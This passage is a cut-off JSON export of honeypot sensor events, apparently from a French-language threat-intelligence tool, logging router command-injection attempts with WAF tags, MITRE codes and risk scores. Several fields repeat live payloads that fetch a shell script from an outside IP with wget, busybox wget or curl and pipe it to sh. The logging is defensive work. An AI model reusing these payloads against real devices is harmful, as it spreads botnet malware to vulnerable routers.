11, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022d91b06d7a3369155bd0056df078a2cf707ae27d0\u0022, \u0022event_fingerprint\u0022: \u00224524ae7b2c6f8e7e1b04ca98c11310b28edf97af\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 444, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022], \u0022matched_patterns\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022, \u0022pat-0103\u0022, \u0022pat-0231\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022CRS 932206\u0022, \u0022LFI Double-dot bypass\u0022, \u0022Probe \/HNAP1\/\u0022], \u0022pattern_ids\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022, \u0022pat-0103\u0022, \u0022pat-0231\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 67}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022d4379046ce19a1e483a3987382b1fbee\u0022, \u0022path_pattern_hash\u0022: \u0022730fc774d6b4b583548b120c70921fd9\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 67}, \u0022payload_preview\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s dhnap2;busybox wget http:\/\/91.92.40.118\/wget.sh\u0022, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/HNAP1\/GetDeviceSettings\/`cd\u0022, \u0022waf_tags\u0022: [\u0022950310:lfi-12\u0022, \u0022950324:rce-0\u0022, \u0022950326:rce-0\u0022, \u0022950334:rce-2\u0022, \u0022950346:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/`cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s dhnap2;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s dhnap2;curl http:\/\/91.92.40.118\/wget.sh|sh -s dhnap2` HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nSOAPAction: \\\u0022http:\/\/purenetwor\u0022, \u0022payload_snippet\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s dhnap2;busybox wget http:\/\/91.92.40.118\/wget.sh\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/HNAP1\/GetDeviceSettings\/`cd\u0022, \u0022waf_tags\u0022: [\u0022950310:lfi-12\u0022, \u0022950324:rce-0\u0022, \u0022950326:rce-0\u0022, \u0022950334:rce-2\u0022, \u0022950346:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/`cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s dhnap2;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s dhnap2;curl http:\/\/91.92.40.118\/wget.sh|sh -s dhnap2` HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nSOAPAction: \\\u0022http:\/\/purenetwor\u0022, \u0022payload_snippet\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s dhnap2;busybox wget http:\/\/91.92.40.118\/wget.sh\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022154e81aa81874c71457d4a198215a91291efa2e3\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/HNAP1\/GetDeviceSettings\/`cd\u0022, \u0022request_line\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/`cd HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s dhnap2;busybox wget http:\/\/91.92.40.118\/wget.sh\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/HNAP1\/GetDeviceSettings\/`cd\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 67\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 67}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 67, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/HNAP1\/GetDeviceSettings\/`cd\u0022, \u0022request_line\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/`cd HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/HNAP1\/GetDeviceSettings\/`cd\u0022, \u0022evidence_snippet\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s dhnap2;busybox wget http:\/\/91.92.40.118\/wget.sh\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950310:lfi-12\u0022, \u0022950324:rce-0\u0022, \u0022950326:rce-0\u0022, \u0022950334:rce-2\u0022, \u0022950346:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022http_no_ua\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"\/tmp;wget","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950310:lfi-12\u0022, \u0022950324:rce-0\u0022, \u0022950326:rce-0\u0022, \u0022950334:rce-2\u0022, \u0022950346:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022http_no_ua\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":474},{"id":11809679,"ip":"45.153.34.252","ts":"2026-07-14 02:29:37.000000","proto":"tcp","src_port":47896,"dst_port":8081,"service":"http","classification":"config_file_probe","waf_score":47,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 3, \u0022http_path_ext\u0022: \u0022js\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00222919e85805df844f358bfd44a8cd7d77ed0a470b\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 293, \u0022payload_entropy\u0022: 5.194297982317913, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 12, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022ad08c0fe425137beb13a14bc582f4e5bcc5e75fe\u0022, \u0022event_fingerprint\u0022: \u002218fa93024fafc5c838e027d57c9653e03628030a\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00226cebb999145248d35aa230e5f745ffd6\u0022, \u0022path_pattern_hash\u0022: \u002295596bbb7d1e66e7933797f3db9d43de\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda\u0022, \u0022query_string\u0022: \u0022deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wge\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda\u0022, \u0022query_string\u0022: \u0022deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda HTTP\/1.1\\r\\nHost: 6\u0022, \u0022payload_snippet\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wge\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022113f8f139ca01a07ebcc3c94196b9ae70eae9a74\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda\u0022, \u0022request_line\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wge\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda\u0022, \u0022request_line\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wge\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: 